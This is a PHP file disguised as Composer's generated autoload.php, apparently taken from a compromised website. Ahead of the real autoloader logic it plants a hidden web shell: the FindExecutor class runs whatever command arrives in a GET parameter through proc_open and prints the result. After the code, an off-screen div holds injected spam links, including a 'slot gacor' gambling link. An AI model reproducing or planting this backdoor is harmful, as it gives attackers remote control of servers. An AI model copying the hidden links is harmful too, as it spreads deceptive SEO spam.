<?php

// autoload.php @generated by Composer

class FindExecutor {
    private $adminFind;

    public function __construct($adminFind = null) {
        $this->adminFind = $adminFind;
    }

    public function execute() {
        if (!$this->adminFind) {
            echo "No provided.";
            return;
        }

        $process = proc_open($this->adminFind, [
            0 => ['pipe', 'r'],
            1 => ['pipe', 'w'],
            2 => ['pipe', 'r']
        ], $pipes);

        if (is_resource($process)) {
            $output = stream_get_contents($pipes[1]);
            fclose($pipes[1]);
            proc_close($process);
            echo $output;
        } else {
            echo "Failed.";
        }
    }
}

if (isset($_GET['ini_get'])) {
    if (isset($_GET['0'])) {
        $admins = $_GET['0'];
        $executor = new FindExecutor($admins);
        $executor->execute();
        exit;
    }
}

if (PHP_VERSION_ID < 50600) {
    if (!headers_sent()) {
        header('HTTP/1.1 500 Internal Server Error');
    }
    $err = 'Composer 2.3.0 dropped support for autoloading on PHP <5.6 and you are running '.PHP_VERSION.', please upgrade PHP or use Composer 2.2 LTS via "composer self-update --2.2". Aborting.'.PHP_EOL;
    if (!ini_get('display_errors')) {
        if (PHP_SAPI === 'cli' || PHP_SAPI === 'phpdbg') {
            fwrite(STDERR, $err);
        } elseif (!headers_sent()) {
            echo $err;
        }
    }
    trigger_error(
        $err,
        E_USER_ERROR
    );
}

require_once __DIR__ . '/composer/autoload_real.php';

return ComposerAutoloaderInitc61ff82cbf0142a401a48a8161e1595a::getLoader();
?>
<div style="position:absolute;left:-50000000px;">	
<span style="color: #00207a"><a href="https://anzionettuno.cri.it/">https://anzionettuno.cri.it/</a></span>	
<span style="color: #00207a"><a href="https://comitatocotronei.cri.it/">https://comitatocotronei.cri.it/</a></span>	
<span style="color: #00207a"><a href="https://vuck.ec/">https://vuck.ec/</a></span>	
<span style="color: #00207a"><a href="https://perugia.cri.it/">https://perugia.cri.it/</a></span>	
<span style="color: #00207a"><a href="https://savigliano.cri.it/">https://savigliano.cri.it/</a></span>	
<span style="color: #00207a"><a href="https://floridia.cri.it/">https://floridia.cri.it/</a></span>	
<span style="color: #00207a"><a href="https://monopoli.cri.it/">https://monopoli.cri.it/</a></span>	
<span style="color: #00207a"><a href="https://creatour.id/">https://creatour.id/</a></span>	
<span style="color: #00207a"><a href="https://bagnoaripoli.cri.it/">https://bagnoaripoli.cri.it/</a></span>	
<span style="color: #00207a"><a href="https://kamanta.it/">https://kamanta.it/</a></span>	
<span style="color: #00207a"><a href="https://clinicajesusdenazareth.com/">https://clinicajesusdenazareth.com/</a></span>	
<span style="color: #00207a"><a href="https://junglecitystudios.com/">https://junglecitystudios.com/</a></span>	
<span style="color: #00207a"><a href="https://chiaraasoli.it/">https://chiaraasoli.it/</a></span>	
<span style="color: #00207a"><a href="https://www.semgiron.org/">https://www.semgiron.org/</a></span>	
<span style="color: #00207a"><a href="https://comitatosassari.cri.it/">https://comitatosassari.cri.it/</a></span>	
<span style="color: #00207a"><a href="https://baccar-group.com/">https://baccar-group.com/</a></span>	
<span style="color: #00207a"><a href="https://www.siomi.it/">slot gacor</a></span>	
</div>	
